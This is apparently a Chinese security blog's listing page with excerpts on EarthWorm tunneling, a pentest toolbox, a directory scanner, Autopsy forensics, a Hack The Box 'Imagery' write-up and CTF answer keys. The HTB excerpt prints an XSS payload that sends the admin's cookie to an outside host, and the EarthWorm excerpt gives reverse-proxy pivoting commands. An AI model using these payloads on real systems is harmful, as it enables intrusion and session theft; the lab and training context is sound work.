EarthWorm (EW) 内网穿透工具使用指南
EarthWorm (EW) 使用指南EarthWorm 是一款高性能的轻量级内网穿透工具,支持正向/反向 SOCKS5 代理及多级转发。 1. 基础环境 核心程序:单个二进制文件(如 ew_for_Win.exe, ew_for_linux64 等)。 核心参数:通过 -s 参数指定链路模式。 2. 常用操作场景场景 A:正向 SOCKS5 代理适用情况:目标机有公网 IP,且防火墙允许外部连接其特定端口。 在目标机上开启监听: 123456789101112 ./ew -s ssocksd -l 88881. **攻击机操作**:直接设置浏览器或代理工具(Proxifier)连接 `目标机IP:8888` 即可。### 场景 B:反向 SOCKS5 代理(最常用)**适用情况**:目标机在内网,无法从外部访问,但它可以主动连接外网。1. **在公网 VPS 上监听(转接隧道):** 将 1080 端口收到的代理请求转发给反连 8888 端口的机器./ew -s rcsocks -l 1080 -e 8888 123452. **在内网目标...
BenD渗透测试工具箱
注:本工具箱基于One-Fox工具箱改编而来,采用他的ui和管理方法,如若侵权可联系我删除 二次开发作者 Bendan 网址:www.nbphp.cn 项目地址:链接:https://pan.quark.cn/s/dc3817eaca73 提取码:fd21 BenD 渗透测试工具箱使用方法直接双击BenD渗透测试工具箱.vbs即可启动 BenD 渗透测试工具箱展示截图 BenD 渗透测试工具箱一个基于 PyQt6 的本地渗透测试工具集启动器与管理器,聚合常用的信息收集、漏洞扫描、后渗透、免杀、抓包代理、WebShell 管理及网页工具,支持分类管理、模糊搜索、快捷键与主题配置,开箱即用。 功能概览 图形化工具管理:按分类展示,支持添加/编辑/删除工具 统一启动方式:支持 GUI、命令行、Python、批处理、PowerShell、Java 8/11、网页 模糊搜索与权重排序:快速定位常用工具 快捷键绑定:为任意工具设置全局热键,一键启动 个性化设置:主题切换、背景图、退出行为、Python/Java 路径 托盘管理与单实例保护:避免重复启...
专业网址目录扫描工具用户手册
项目地址:https://github.com/benbenbendang/WebScan-Pro WebScan Pro - 专业网址目录扫描工具用户手册1. 工具概述与价值主张WebScan Pro 是一款专为安全研究人员和渗透测试工程师设计的高性能网站目录扫描工具。它采用模块化架构设计,结合了强大的多线程扫描引擎与直观的图形用户界面(GUI),旨在帮助用户快速、准确地发现目标网站的隐藏资源、未授权访问接口及敏感文件。 核心价值 高效发现:基于连接池技术的多线程并发扫描,大幅提升扫描速度。 灵活易用:同时提供专业的命令行(CLI)模式和现代化的图形界面(GUI),满足不同场景需求。 智能监控:实时可视化展示扫描进度、状态码分布及网络响应情况。 国际化支持:内置中英文双语界面,一键切换,打破语言障碍。 2. 系统要求与安装部署步骤2.1 系统环境要求 操作系统:Windows 10/11, macOS, Linux (Ubuntu/CentOS等) 运行环境:Python 3.6 及以上版本 依赖库:PyQt6, requests, rich, col...
Autopsy的使用方法
Autopsy的使用方法kali中使用方法 先在终端中启动这个程序,然后会生成一个9999端口的网站,直接点击访问 点击New Case 创建案例 因为原本是英文的,所以直接翻译了,然后这个地方案件名称、描述,调查员姓名(只填a即可)都可以随便填,看你自己, 中译一下,方便查看,直接Add Host添加主机 1. 核心设置项 Host Name(主机名): 必填项。给这台设备起个名字,比如 host1 或 target_pc。只能包含字母、数字和符号。 Description(描述): 选填。简单备注一下这台设备是什么,例如“嫌疑人的办公电脑”。 2. 时间与同步设置(对取证非常重要) Time zone(时区): 选填。如果你知道原设备所在的时区,可以在这里设置(例如 GMT+8)。这能确保你后续在 Timeline(时间线) 分析中看到的是准确的当地时间。 Timeskew Adjustment(时间偏移调整): 选填。如果原设备的系统时间比准确时间快了或慢了,你可以在这里输入秒数进行补偿(例如快了 10 秒,就填 -10)。 3. 进阶数据库(做 CTF 或常...
HTB-Imagery-WP
HTB-Imagery扫描靶机 1nmap -A -v 10.10.11.88 就两个端口,有个8000端口可以访问,把imagery.htb放到host然后访问一下 进入后可以看到右上角个注册和登录按钮,先注册然后登陆进去 有个upload按钮,可以上传图片格式的文件,先尝试上传图片 在自己的图库里面可以看到刚刚上传的图片,并且可以下载删除,但是不能传送和修改图片,估计需要admin账号,查看一下登陆框有没有xss漏洞 看来啥也没有,看一下页面,可以发现最底下有个有个Report bug的按钮 这个是用来报告图库的bug使用 测试一下有没有xss漏洞,用bp抓包,可以看到有返回请求,不断的发请求 利用xss漏洞拿到admin的cookie 1<img src=1 onerror="document.location='http://10.10.14.24/cxk/'+ document.cookie"></img> 成功的拿到了admin的cookie,然后将cookie写到后台,更新重新打开...
流量分析和Windows应急响应的部分原创题(含附件)
1.misc,先给一个压缩包伪装加密,然后提供一个图片,图片使用zsteg隐写提示文件分离的压缩包解压密码,然后解压出doro.doc,rodo.doc中藏一个图片,图片下方放入flag 解压密码:GIF_LSB_Ezflag 最终flag{Ctts_get_the_flag!!} 2.使用Windows搭建一个网站,进行应急响应 开机密码:xiaochen112233 2.流量分析应急响应—流量分析 1.hack的IP地址作为flag提交 flag{192.168.20.137} 2.hack访问的端口有哪些?从小到大排序提交,flag{xx,xx,xx,xx} flag{80,433} 3,hack找到的第一个可注入网页名称是什么? flag{shell.php} 4.hack上传的木马文件名称是什么? flag{1233.php} 5.hack的木马key是什么? flag{cmd} 6.靶机的系统版本是多少?hint:只需要写版本号即可 flag{6.1.7601} 7.hack执行的第一个命令是什么? flag{dir} 8.hack获取的开机密码是多少? flag{x...





